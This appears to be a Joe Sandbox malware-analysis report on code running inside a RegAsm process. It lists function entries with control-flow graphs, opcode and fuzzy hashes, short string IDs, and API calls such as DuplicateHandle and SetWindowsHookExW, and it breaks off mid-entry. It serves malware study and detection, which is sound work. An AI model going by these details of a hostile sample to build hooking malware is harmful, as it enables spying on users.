                                                                                • Opcode ID: 0843d8aced4b1406124222a8d7e2e1c623117cd841b7a40ce17b0d5b5e8a70f4
                                                                                • Instruction ID: 1ecaf3c7c2112bafe22ff46779ca5804c10f4514a49e04be23a2aaac223b6073
                                                                                • Opcode Fuzzy Hash: 0843d8aced4b1406124222a8d7e2e1c623117cd841b7a40ce17b0d5b5e8a70f4
                                                                                • Instruction Fuzzy Hash: 5981A435B002098FDB44EF69D4547AEB7B6FB88310F248529E911EB794CB35DD92CBA0
                                                                                Function 06912EC8 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 775 6912ec8-6912f08 778 6912f0a-6912f12 775->778 779 6912f3e-6912f58 775->779 780 6912f20-6912f2f 778->780 781 6912f14-6912f16 778->781 786 6912f5a-6912f62 779->786 787 6912f8e-6912fd8 779->787 785 6912f34-6912f3b 780->785 781->780 788 6912f70-6912f8b 786->788 789 6912f64-6912f66 786->789 787->789 797 6912fda-6913022 787->797 789->788 800 6913024-6913027 797->800 801 6913029 797->801 802 691302b-6913096 800->802 801->802 811 69130a6 802->811 812 6913098-69130a4 802->812 813 69130a8-69130ac 811->813 812->813 815 69130bc 813->815 816 69130ae-69130ba 813->816 817 69130be-69130df 815->817 816->817
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ,q$4'q$xX@s<h
                                                                                • API String ID: 0-1667775575
                                                                                • Opcode ID: 8bec3f1dc7153b3e0eca82bafc6b7081d7614a09f8e5213fa99d882e43393aa6
                                                                                • Instruction ID: e10ca2649f5a9f90d56a713829deb8ecb3428f58c983f3149b98e78448a43418
                                                                                • Opcode Fuzzy Hash: 8bec3f1dc7153b3e0eca82bafc6b7081d7614a09f8e5213fa99d882e43393aa6
                                                                                • Instruction Fuzzy Hash: 1351B871F002048FCB55DF69D4506AEBBF6EFC9210B25806AE505EB355DE30DD0687A1
                                                                                Function 06915FF0 Relevance: 2.6, Strings: 2, Instructions: 111COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 957 6915ff0-6915ffd 958 6916003 957->958 959 6916157-6916160 957->959 960 6916143 958->960 961 6916072-691607b 958->961 962 69160c4-69160cd 958->962 963 6916048-6916051 958->963 964 6916118-6916128 958->964 965 691600a-6916019 958->965 966 691612a-6916141 958->966 967 691614d-6916155 958->967 968 691609c-69160a5 958->968 969 691601e-6916023 958->969 970 69160ee-69160f7 958->970 971 6916166-6916169 959->971 1000 6916145 call 69161b0 960->1000 1001 6916145 call 69161a0 960->1001 972 6916089-6916097 961->972 973 691607d-691607f 961->973 976 69160db-69160ec 962->976 977 69160cf-69160d1 962->977 982 6916053-6916055 963->982 983 691605f-691606d 963->983 964->971 965->971 966->971 967->971 974 69160b3-69160bf 968->974 975 69160a7-69160a9 968->975 980 6916025-691602b 969->980 981 691603b-6916043 969->981 978 6916105-6916116 970->978 979 69160f9-69160fb 970->979 972->971 973->972 974->971 975->974 976->971 977->976 978->971 979->978 988 691602d 980->988 989 691602f-6916039 980->989 981->971 982->983 983->971 985 691614b 985->971 988->981 989->981 1000->985 1001->985
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $q$$q
                                                                                • API String ID: 0-3126353813
                                                                                • Opcode ID: 236bd102dc363cd7928d95a9ce02cb6a7a0f52484be806caef39618e46d57d00
                                                                                • Instruction ID: f85d2d484021e8f85e35c5103384a8b6a5a78d65ed52467b0b34244c6d0672f5
                                                                                • Opcode Fuzzy Hash: 236bd102dc363cd7928d95a9ce02cb6a7a0f52484be806caef39618e46d57d00
                                                                                • Instruction Fuzzy Hash: FC418C34B04419CFE7885B1AD60962ABB77FF846067788948E1069FB51CF329D53CBC6
                                                                                Function 02A693CF Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1075 2a693cf-2a693d5 1077 2a693d7-2a693e1 1075->1077 1078 2a6936a-2a6936b 1075->1078 1081 2a69376-2a69398 1077->1081 1082 2a693e3 1077->1082 1079 2a698e0-2a69974 DuplicateHandle 1078->1079 1083 2a69976-2a6997c 1079->1083 1084 2a6997d-2a6999a 1079->1084 1086 2a693e5-2a693e6 1082->1086 1087 2a6939d-2a693a4 1082->1087 1083->1084 1092 2a69404-2a6942c 1087->1092 1093 2a693a5-2a693b7 1087->1093
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A698A6,?,?,?,?,?), ref: 02A69967
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3687608682.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_2a60000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 3e8e9d913ed86d63a672dfb66abab00f90213eac974aca9eec488c934434ad12
                                                                                • Instruction ID: b2f58159ed415784eefae8235556c90568d3881d7d69b5f9794edd4a6afcd0b5
                                                                                • Opcode Fuzzy Hash: 3e8e9d913ed86d63a672dfb66abab00f90213eac974aca9eec488c934434ad12
                                                                                • Instruction Fuzzy Hash: 1141D172C043099FDB11CFA9D889BEBBBF4EB49354F05449AE454EB290D734D905CBA2
                                                                                Function 02A69364 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A698A6,?,?,?,?,?), ref: 02A69967
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3687608682.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_2a60000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 7983e0f63359a97ab5f8f760699d106579640deb5b53a11fecb1056fe3352a0e
                                                                                • Instruction ID: e949e4bdfc14feff35c03df8818d7ded48dc398bd25eeefc5d48dabdc9adc31b
                                                                                • Opcode Fuzzy Hash: 7983e0f63359a97ab5f8f760699d106579640deb5b53a11fecb1056fe3352a0e
                                                                                • Instruction Fuzzy Hash: 9A21E5B5900249EFDB10CF9AD584BEEBBF4EB48310F14845AE914A7310D778A944CFA5
                                                                                Function 02A698D8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A698A6,?,?,?,?,?), ref: 02A69967
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3687608682.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_2a60000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 05bb121147784bc7bdbcaeb002f968b24cbb72e812cca2f17f702fd148ece6d3
                                                                                • Instruction ID: 67f06c68f64472fa0690568835d007598c520ff0c036627d118bb6c0ecabdf3d
                                                                                • Opcode Fuzzy Hash: 05bb121147784bc7bdbcaeb002f968b24cbb72e812cca2f17f702fd148ece6d3
                                                                                • Instruction Fuzzy Hash: B721E4B6D00249DFDB10CFAAD584AEEBBF4EB48314F14841AE918B7310D378A954CF65
                                                                                Function 02A63D78 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 02A63DFB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3687608682.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_2a60000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: HookWindows
                                                                                • String ID:
                                                                                • API String ID: 2559412058-0
                                                                                • Opcode ID: 4e7cb6408233cfc2a45605ac69027ec3e16b318b09c908c0b63219969c02a4f2
                                                                                • Instruction ID: b436d5218becb80fd0a21dba108555c6e62fbc7fb9b22d1ba07521c69cd42982
                                                                                • Opcode Fuzzy Hash: 4e7cb6408233cfc2a45605ac69027ec3e16b318b09c908c0b63219969c02a4f2
                                                                                • Instruction Fuzzy Hash: 8D213771D00249CFDB14CFAAD944BEEBBF0EF88710F10846AE415A7250CB749945CFA0
                                                                                Function 02A63D80 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 02A63DFB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3687608682.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_2a60000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: HookWindows
                                                                                • String ID:
                                                                                • API String ID: 2559412058-0
                                                                                • Opcode ID: be1591b1f9e9e8006a2ac60e2ab9b6380191acb95da013ea13e4fc5b4c501835
                                                                                • Instruction ID: 17f605a22c327f7975c4cbba958b7d72e88d6b3258b6099a57e6b62f6c655d45
                                                                                • Opcode Fuzzy Hash: be1591b1f9e9e8006a2ac60e2ab9b6380191acb95da013ea13e4fc5b4c501835
                                                                                • Instruction Fuzzy Hash: 7C211375D00248DFDB14CFAAC944BEEBBF4EF88310F10842AE419A7250CB78A945CFA5
                                                                                Function 0691286F Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: xX@s<h
                                                                                • API String ID: 0-4035273746
                                                                                • Opcode ID: d930b86b32615a791e2cad28188f3d974a56646437ffe4117e379bfff812173c
                                                                                • Instruction ID: 3eea099a8f7dc0b7b5814ca7ca1f46583532f62a6e8f66fcf98f3997ffcb89ba
                                                                                • Opcode Fuzzy Hash: d930b86b32615a791e2cad28188f3d974a56646437ffe4117e379bfff812173c
                                                                                • Instruction Fuzzy Hash: EA91E6317043099FDB54DF25D884AAABBB6FF85320B24C56AE906CF791CB31D945CBA0
                                                                                Function 06916B18 Relevance: 1.5, Strings: 1, Instructions: 213COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: xq
                                                                                • API String ID: 0-3670251435
                                                                                • Opcode ID: 0e89aace7a67fb99704aa2715ee90cdcf43d5464e6092b9a44d809e7831af70e
                                                                                • Instruction ID: 1ba71d8a250fb1b874ca39a8ee92fce98333ce1dfa1c3adf93d785b0ed568830
                                                                                • Opcode Fuzzy Hash: 0e89aace7a67fb99704aa2715ee90cdcf43d5464e6092b9a44d809e7831af70e
                                                                                • Instruction Fuzzy Hash: BC915074929A05CFEBA4CF19EC4976C7BBAF784314F25811AE5018F6A4CF789846CF81
                                                                                Function 069167F0 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Teq
                                                                                • API String ID: 0-1098410595
                                                                                • Opcode ID: 5127e73f6028b352dc3fd475f83e34a41d18e6a3a2764eb228c064bb85b01f37
                                                                                • Instruction ID: 63cbda6aac964497c15e2427102f7e8c9551a6294d746fd2431e4032f08da66a
                                                                                • Opcode Fuzzy Hash: 5127e73f6028b352dc3fd475f83e34a41d18e6a3a2764eb228c064bb85b01f37
                                                                                • Instruction Fuzzy Hash: E3518C74A00204DFEB54DF69D858BA9BBB6FF88710F248159E511AF7E0CB71AC41CB90
                                                                                Function 06915FD9 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $q
                                                                                • API String ID: 0-1301096350
                                                                                • Opcode ID: cafd0c5e4e1191e4c0521e4c110b7bd75754f575935a86047e10a25a4ddadddb
                                                                                • Instruction ID: 771dcbbb6063a4b14fbdc1d41d686c25c8198da8acab0832e9601ef2bb2ce445
                                                                                • Opcode Fuzzy Hash: cafd0c5e4e1191e4c0521e4c110b7bd75754f575935a86047e10a25a4ddadddb
                                                                                • Instruction Fuzzy Hash: 9741E034B08518CFEB895B19C604629BF37FF856067788989E1069FA52CF329D53CBC6
                                                                                Function 06917335 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Teq
                                                                                • API String ID: 0-1098410595
                                                                                • Opcode ID: 54f312d996a74b3acb919473809093f11e18af12d9355dd0d9cbceb7a3892954
                                                                                • Instruction ID: a68d12246de07b5172f21385b59a293e10b2d81b53b8f15fe11b13767c23af65
                                                                                • Opcode Fuzzy Hash: 54f312d996a74b3acb919473809093f11e18af12d9355dd0d9cbceb7a3892954
                                                                                • Instruction Fuzzy Hash: 72319370B001098FE7549FA9C454BAEBBE6AF88710F254459E501EB7A4CEB09C46CB95
                                                                                Function 06914801 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $q
                                                                                • API String ID: 0-1301096350
                                                                                • Opcode ID: 090c24cf89020c6035781c930fc0f04585fc6b5808b90d77ac8bd5c1937c8cb9
                                                                                • Instruction ID: dce941a73fb104cb81b221d351450b09b2a0537e21544a552d65fda2e44bc0fe
                                                                                • Opcode Fuzzy Hash: 090c24cf89020c6035781c930fc0f04585fc6b5808b90d77ac8bd5c1937c8cb9
                                                                                • Instruction Fuzzy Hash: 42118131B002595FD724EE6AD850A6ABBDAEFC5751B24807AE505CF270DA31DC52C7A0
                                                                                Function 06915F08 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Teq
                                                                                • API String ID: 0-1098410595
                                                                                • Opcode ID: d187c6227948584efef82c24bfdc59ddfca0c1e09d3a5c862b4d9aadac413928
                                                                                • Instruction ID: ee7292b59f1ec9eabbb00dd11fdb344efc26459177e21d1b0ff7b0222d44b12e
                                                                                • Opcode Fuzzy Hash: d187c6227948584efef82c24bfdc59ddfca0c1e09d3a5c862b4d9aadac413928
                                                                                • Instruction Fuzzy Hash: 26218E707101188FDB449B68D918BAE7BFAAF88710F364169E516EF3E0CF708C048B91
                                                                                Function 06915B50 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: xX@s<h
                                                                                • API String ID: 0-4035273746
                                                                                • Opcode ID: 804fb4a4d850e8e614a429395e9dd64ba0d7a6e9436c91b10a14bea324510c06
                                                                                • Instruction ID: 1297a8d87544d867b7153dd77956a0c7c85f56eff8a9313b95bb23e774f81266
                                                                                • Opcode Fuzzy Hash: 804fb4a4d850e8e614a429395e9dd64ba0d7a6e9436c91b10a14bea324510c06
                                                                                • Instruction Fuzzy Hash: D5112231B002485FC704DF78D951A5E7BE6EFC120031688ABD505CF2A1EE309E0A83E1
                                                                                Function 06915EF8 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Teq
                                                                                • API String ID: 0-1098410595
                                                                                • Opcode ID: 55015e6b54ac648303b1bf4ca71df50fbe7c39f0b0ae8ad49fd758ef15f7b0c9
                                                                                • Instruction ID: 7b1e880e7631439c0770c30bee45b8014e7b9d7c7b9f3c0a30e9ffdd1e76d95f
                                                                                • Opcode Fuzzy Hash: 55015e6b54ac648303b1bf4ca71df50fbe7c39f0b0ae8ad49fd758ef15f7b0c9
                                                                                • Instruction Fuzzy Hash: 7B2147757101188FEB44DF68C558BAE7BF6AF88610F2A406AE116EB3A0CF708C058B91
                                                                                Function 069166D8 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Teq
                                                                                • API String ID: 0-1098410595
                                                                                • Opcode ID: dcfd1fe30b42c7b3a989405e0afc6360d6c6659ec736f9e8d735c0532f829b80
                                                                                • Instruction ID: ab1300036015f1b47fa3077a4bbf9bccb8c43eee0bbac3eac61a4a3ce29f0a2b
                                                                                • Opcode Fuzzy Hash: dcfd1fe30b42c7b3a989405e0afc6360d6c6659ec736f9e8d735c0532f829b80
                                                                                • Instruction Fuzzy Hash: FB115430B502049FDB64DF69C898BADBBE6EF88714F25445AE901EF3A1CB719C45CB90
                                                                                Function 06917287 Relevance: 1.3, Strings: 1, Instructions: 54COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Teq
                                                                                • API String ID: 0-1098410595
                                                                                • Opcode ID: 3302fdbf025972ccb607dc51babe82884ca6646f30e8d59980297b98407ea1b9
                                                                                • Instruction ID: 78734252b6cd89cab92f2131149b6b2efb85404bac11744a0ca399b03efc2c77
                                                                                • Opcode Fuzzy Hash: 3302fdbf025972ccb607dc51babe82884ca6646f30e8d59980297b98407ea1b9
                                                                                • Instruction Fuzzy Hash: 2311AC317101159FEB149F68C958BADBBF2AF8C710F250569E542EB7E0CB709C0ACB91
                                                                                Function 06917298 Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Teq
                                                                                • API String ID: 0-1098410595
                                                                                • Opcode ID: cbd89f61edb52ff0a6c44a5358a3571d782d0e16f9a648c3cad11b53f809ab09
                                                                                • Instruction ID: 0a05531c0ac787d5256c96e6a63b3176be85b334f1105c563abea21f56f0f4fe
                                                                                • Opcode Fuzzy Hash: cbd89f61edb52ff0a6c44a5358a3571d782d0e16f9a648c3cad11b53f809ab09
                                                                                • Instruction Fuzzy Hash: 9401C0317101049FEB149B69C858BAE7BF6AF8C700F200069E502EB3E0CFB19C06CB91
                                                                                Function 06916ED0 Relevance: .2, Instructions: 248COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 187f1b3d47f2f65a3387b88b0ea60667cb4f9f0a1bec899613401db900903072
                                                                                • Instruction ID: eb72e323e211e22e05da83f8a7100b209c3a07df6e7185c196120b1c9bc32790
                                                                                • Opcode Fuzzy Hash: 187f1b3d47f2f65a3387b88b0ea60667cb4f9f0a1bec899613401db900903072
                                                                                • Instruction Fuzzy Hash: 78918134B003098FDB99EF74D45466D7BB2EF89200B218969E8069F399EF359D07CB91
                                                                                Function 06914630 Relevance: .2, Instructions: 171COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4ac7d549da5b0cadb676f0e5785bc721c0e243adf9321785e353ed341f1fcf8c
                                                                                • Instruction ID: 12c36f1a41ca9f0d4e114d7bd4d2c5a3da436aed9014c5e748168d323100a485
                                                                                • Opcode Fuzzy Hash: 4ac7d549da5b0cadb676f0e5785bc721c0e243adf9321785e353ed341f1fcf8c
                                                                                • Instruction Fuzzy Hash: 7F61B034A0060A9FCB10CF58C8C4DAABBFAFF89314F24C56AE515CB6A1D730E955CB90
                                                                                Function 06918448 Relevance: .1, Instructions: 124COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 47e5c8a1ad29d9cdc20b9dc9e7b883a8f9903fde842f0f32619262d6f031dedb
                                                                                • Instruction ID: 1743aabcaea5083e5596f89cbd81531f632b9798358ab02ae4df7c463ca381e0
                                                                                • Opcode Fuzzy Hash: 47e5c8a1ad29d9cdc20b9dc9e7b883a8f9903fde842f0f32619262d6f031dedb
                                                                                • Instruction Fuzzy Hash: 62413D75E002189FDB54CB99D944AEDB7F9FF88310F2580A6E905EB660DB30DC42DB91
                                                                                Function 06915C28 Relevance: .1, Instructions: 108COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: af6498f385d3508a9aff0abf78c74d1f3fa24778b11d3bd3db4a5fd3502ac547
                                                                                • Instruction ID: 638e74cd4f613f673039f70d189c71457146f0639d314e9f52bb900e14547944
                                                                                • Opcode Fuzzy Hash: af6498f385d3508a9aff0abf78c74d1f3fa24778b11d3bd3db4a5fd3502ac547
                                                                                • Instruction Fuzzy Hash: 0C41E2B5D0120CDFDB14CFA9D944BDEBBF5AF88310F25802AE415AB650DB709945CF50
                                                                                Function 069161B0 Relevance: .1, Instructions: 102COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cd2b7dd63d3412d2a640bede47467d353ad86c3b17ed7818058f782317783e46
                                                                                • Instruction ID: 3a555602de7187fb214112182428e53e00af0fd4d92f06b203db8eb42470a2eb
                                                                                • Opcode Fuzzy Hash: cd2b7dd63d3412d2a640bede47467d353ad86c3b17ed7818058f782317783e46
                                                                                • Instruction Fuzzy Hash: D3416074A00115CFCB54DF54C984A6ABBB2FF85301F6188A5E851AF7A6CB30EC41CBA0
                                                                                Function 06915C1C Relevance: .1, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 48b6665bb180eb81e7ebafad4b4de2a9c14e47553f086432aac1cb3c8485e83a
                                                                                • Instruction ID: 571a62fa3261e3e18eb973756670317dab49fd6b4e65bc833eee7928b973e86c
                                                                                • Opcode Fuzzy Hash: 48b6665bb180eb81e7ebafad4b4de2a9c14e47553f086432aac1cb3c8485e83a
                                                                                • Instruction Fuzzy Hash: D541E1B5D0124CDFDB14CFA9C998BDEBBF5AF88304F25802AE409AB650DB705945CB50
                                                                                Function 06916ECE Relevance: .1, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8dc775363244a1192a127b9088fe14d6930c63838900cb9b454d71906a1f9e08
                                                                                • Instruction ID: e0cdcf3b827d1bdc250f832ac5a36c36f6b9bfe326a2b81fa1ed536c3746802c
                                                                                • Opcode Fuzzy Hash: 8dc775363244a1192a127b9088fe14d6930c63838900cb9b454d71906a1f9e08
                                                                                • Instruction Fuzzy Hash: 0521C034B003054BEB14AB79A59467E77ABDBC86047208529D906CF38CEF75DD0B8BE5
                                                                                Function 00E0D0FC Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3683935927.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_e0d000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
